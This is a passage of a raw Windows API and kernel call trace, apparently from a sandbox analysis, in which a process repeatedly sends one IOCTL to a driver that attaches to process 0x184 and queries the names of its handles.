ObReferenceObjectByHandle (in: Handle=0x484, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001876e90, HandleInformation=0x0) returned 0x0 [0133.012] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.012] PsReleaseProcessExitSynchronization () returned 0x2 [0133.012] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.012] ObQueryNameString (in: Object=0xfffff8a001876e90, ObjectNameInfo=0xfffffa80027f3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027f3044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.012] ObfDereferenceObject (Object=0xfffff8a001876e90) returned 0x1 [0133.012] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.012] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.012] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.012] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.012] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.012] PsAcquireProcessExitSynchronization () returned 0x0 [0133.012] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.012] ObReferenceObjectByHandle (in: Handle=0x490, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001828a50, HandleInformation=0x0) returned 0x0 [0133.012] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.012] PsReleaseProcessExitSynchronization () returned 0x2 [0133.013] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.013] ObQueryNameString (in: Object=0xfffff8a001828a50, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.013] ObfDereferenceObject (Object=0xfffff8a001828a50) returned 0x1 [0133.013] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.013] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.013] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.013] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.013] PsAcquireProcessExitSynchronization () returned 0x0 [0133.013] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.013] ObReferenceObjectByHandle (in: Handle=0x4a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001309060, HandleInformation=0x0) returned 0x0 [0133.013] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.013] PsReleaseProcessExitSynchronization () returned 0x2 [0133.013] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.013] ObQueryNameString (in: Object=0xfffff8a001309060, ObjectNameInfo=0xfffffa800284b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284b044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.013] ObfDereferenceObject (Object=0xfffff8a001309060) returned 0x1 [0133.013] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.013] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.013] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.014] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.014] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.014] PsAcquireProcessExitSynchronization () returned 0x0 [0133.014] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.014] ObReferenceObjectByHandle (in: Handle=0x4b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001885b90, HandleInformation=0x0) returned 0x0 [0133.014] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.014] PsReleaseProcessExitSynchronization () returned 0x2 [0133.014] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.014] ObQueryNameString (in: Object=0xfffff8a001885b90, ObjectNameInfo=0xfffffa800284c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284c044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.014] ObfDereferenceObject (Object=0xfffff8a001885b90) returned 0x1 [0133.014] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.014] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.014] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.014] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.014] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.014] PsAcquireProcessExitSynchronization () returned 0x0 [0133.014] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.014] ObReferenceObjectByHandle (in: Handle=0x4c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00187c200, HandleInformation=0x0) returned 0x0 [0133.015] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.015] PsReleaseProcessExitSynchronization () returned 0x2 [0133.015] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.015] ObQueryNameString (in: Object=0xfffff8a00187c200, ObjectNameInfo=0xfffffa800284d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284d044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.015] ObfDereferenceObject (Object=0xfffff8a00187c200) returned 0x1 [0133.015] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.015] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.015] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.015] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.015] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.015] PsAcquireProcessExitSynchronization () returned 0x0 [0133.015] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.015] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001890aa0, HandleInformation=0x0) returned 0x0 [0133.015] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.015] PsReleaseProcessExitSynchronization () returned 0x2 [0133.015] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.015] ObQueryNameString (in: Object=0xfffff8a001890aa0, ObjectNameInfo=0xfffffa8002855044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002855044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.015] ObfDereferenceObject (Object=0xfffff8a001890aa0) returned 0x1 [0133.015] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.015] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.016] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.016] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.016] PsAcquireProcessExitSynchronization () returned 0x0 [0133.016] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.016] ObReferenceObjectByHandle (in: Handle=0x4e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001883230, HandleInformation=0x0) returned 0x0 [0133.016] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.016] PsReleaseProcessExitSynchronization () returned 0x2 [0133.016] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.016] ObQueryNameString (in: Object=0xfffff8a001883230, ObjectNameInfo=0xfffffa8002856044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002856044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.016] ObfDereferenceObject (Object=0xfffff8a001883230) returned 0x1 [0133.016] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.016] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.016] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.016] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.016] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.016] PsAcquireProcessExitSynchronization () returned 0x0 [0133.017] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.017] ObReferenceObjectByHandle (in: Handle=0x4f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00187fb60, HandleInformation=0x0) returned 0x0 [0133.017] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.017] PsReleaseProcessExitSynchronization () returned 0x2 [0133.017] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.017] ObQueryNameString (in: Object=0xfffff8a00187fb60, ObjectNameInfo=0xfffffa8002878044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002878044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.017] ObfDereferenceObject (Object=0xfffff8a00187fb60) returned 0x1 [0133.017] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.017] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.017] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.017] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.017] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.017] PsAcquireProcessExitSynchronization () returned 0x0 [0133.017] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.017] ObReferenceObjectByHandle (in: Handle=0x500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00183fce0, HandleInformation=0x0) returned 0x0 [0133.017] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.017] PsReleaseProcessExitSynchronization () returned 0x2 [0133.017] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.017] ObQueryNameString (in: Object=0xfffff8a00183fce0, ObjectNameInfo=0xfffffa800287c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800287c044, ReturnLength=0xfffff88005163550) returned 0x0 [0133.017] ObfDereferenceObject (Object=0xfffff8a00183fce0) returned 0x1 [0133.017] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.018] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.018] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.018] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.018] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.018] PsAcquireProcessExitSynchronization () returned 0x0 [0133.018] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.018] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00189db20, HandleInformation=0x0) returned 0x0 [0133.018] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0133.018] PsReleaseProcessExitSynchronization () returned 0x2 [0133.018] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0133.018] ObQueryNameString (in: Object=0xfffff8a00189db20, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0133.018] ObfDereferenceObject (Object=0xfffff8a00189db20) returned 0x1 [0133.018] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0133.018] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0133.018] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0133.019] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0133.019] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0133.019] PsAcquireProcessExitSynchronization () returned 0x0 [0133.019] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0133.019] ObReferenceObjectByHandle (in: Handle=0x520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018a2f30, HandleInformation=0x0) returned 0x0 [0133.019] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.579] PsReleaseProcessExitSynchronization () returned 0x2 [0135.579] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.579] ObQueryNameString (in: Object=0xfffff8a0018a2f30, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.579] ObfDereferenceObject (Object=0xfffff8a0018a2f30) returned 0x1 [0135.579] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.579] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.579] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.580] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.580] PsAcquireProcessExitSynchronization () returned 0x0 [0135.580] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.580] ObReferenceObjectByHandle (in: Handle=0x530, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018a19e0, HandleInformation=0x0) returned 0x0 [0135.580] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.580] PsReleaseProcessExitSynchronization () returned 0x2 [0135.580] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.580] ObQueryNameString (in: Object=0xfffff8a0018a19e0, ObjectNameInfo=0xfffffa80025f17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0135.580] ObfDereferenceObject (Object=0xfffff8a0018a19e0) returned 0x1 [0135.580] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.581] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.581] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.581] PsAcquireProcessExitSynchronization () returned 0x0 [0135.581] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.581] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00183fb00, HandleInformation=0x0) returned 0x0 [0135.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.581] PsReleaseProcessExitSynchronization () returned 0x2 [0135.581] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.581] ObQueryNameString (in: Object=0xfffff8a00183fb00, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.581] ObfDereferenceObject (Object=0xfffff8a00183fb00) returned 0x1 [0135.581] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.581] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.581] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.581] PsAcquireProcessExitSynchronization () returned 0x0 [0135.581] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.581] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018a7e30, HandleInformation=0x0) returned 0x0 [0135.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.582] PsReleaseProcessExitSynchronization () returned 0x2 [0135.582] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.582] ObQueryNameString (in: Object=0xfffff8a0018a7e30, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.582] ObfDereferenceObject (Object=0xfffff8a0018a7e30) returned 0x1 [0135.582] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.582] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.582] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.582] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.582] PsAcquireProcessExitSynchronization () returned 0x0 [0135.582] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.582] ObReferenceObjectByHandle (in: Handle=0x560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018b0ee0, HandleInformation=0x0) returned 0x0 [0135.582] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.582] PsReleaseProcessExitSynchronization () returned 0x2 [0135.582] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.582] ObQueryNameString (in: Object=0xfffff8a0018b0ee0, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.582] ObfDereferenceObject (Object=0xfffff8a0018b0ee0) returned 0x1 [0135.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.583] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.583] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.583] PsAcquireProcessExitSynchronization () returned 0x0 [0135.583] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.583] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018adf30, HandleInformation=0x0) returned 0x0 [0135.583] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.583] PsReleaseProcessExitSynchronization () returned 0x2 [0135.583] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.583] ObQueryNameString (in: Object=0xfffff8a0018adf30, ObjectNameInfo=0xfffffa80027e0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e0044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.583] ObfDereferenceObject (Object=0xfffff8a0018adf30) returned 0x1 [0135.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.583] HeapFree 